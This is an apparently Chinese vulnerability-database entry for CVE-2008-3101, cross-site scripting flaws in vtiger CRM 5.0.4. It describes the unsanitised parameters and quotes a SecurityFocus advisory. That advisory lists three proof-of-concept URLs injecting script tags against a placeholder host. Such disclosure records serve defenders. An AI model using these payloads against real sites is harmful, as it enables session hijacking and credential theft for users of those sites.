vtiger CRM多个跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115997 漏洞类型 跨站脚本
发布时间 2008-09-01 更新时间 2008-09-01
CVE编号 CVE-2008-3101 CNNVD-ID CNNVD-200809-021
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/32307
https://www.securityfocus.com/bid/30951
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-021
|漏洞详情
vtigerCRM是基于web的开源客户关系管理系统。vtigerCRM实现上存在漏洞,远程攻击者可以通过向vtigerCRM的多个模块提交恶意的认证或查询请求执行跨站脚本攻击。1)当module设置为Users且action设置为Authenticate的时候,index.php文件没有正确的验证对user_password参数的输入便返回给了用户,可能导致在用户浏览器会话中执行任意HTML和脚本代码。2)当module设置为Products且action设置为index的时候,index.php文件没有正确的验证对parenttab参数的输入;当module设置为Home且action设置为UnifiedSearch的时候,index.php没有正确的验证对query_string参数的输入,这可能导致在用户浏览器会话中执行任意HTML和脚本代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/30951/info

vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

vtiger CRM 5.0.4 is vulnerable; other versions may also be affected.

http://www.example.com/vtigercrm/index.php?module=Products&action=index&parenttab="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Users&action=Authenticate&user_password="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script>
|受影响的产品
vtiger vtiger CRM 5.0.4
|参考资料

来源:BID
名称:30951
链接:http://www.securityfocus.com/bid/30951
来源:SECUNIA
名称:31679
链接:http://secunia.com/advisories/31679
来源:XF
名称:vtigercrm-index-xss(44792)
链接:http://xforce.iss.net/xforce/xfdb/44792
来源:MISC
链接:http://www.vtiger.de/vtiger-crm/downloads/patches.html?tx_abdownloads_pi1%5Baction%5D=getviewdetailsfordownload&tx_abdownloads_pi1%5Buid%5D=128&tx_abdownloads_pi1%5Bcategory_uid%5D=5&cHash=e16be773a5
来源:BUGTRAQ
名称:20080901MultipleCrossSiteScripting(XSS)VulnerabilitiesinvtigerCRM5.0.4,CVE-2008-3101
链接:http://www.securityfocus.com/archive/1/archive/1/495885/100/0/threaded
来源:VUPEN
名称:ADV-2008-2471
链接:http://www.frsirt.com/english/advisories/2008/2471
来源:MISC
链接:http://www.datensalat.eu/~fabian/cve/CVE-2008-3101-vtigerCRM.html
来源:SREASON
名称:4208
链接:http://securityreason.com/securityalert/4208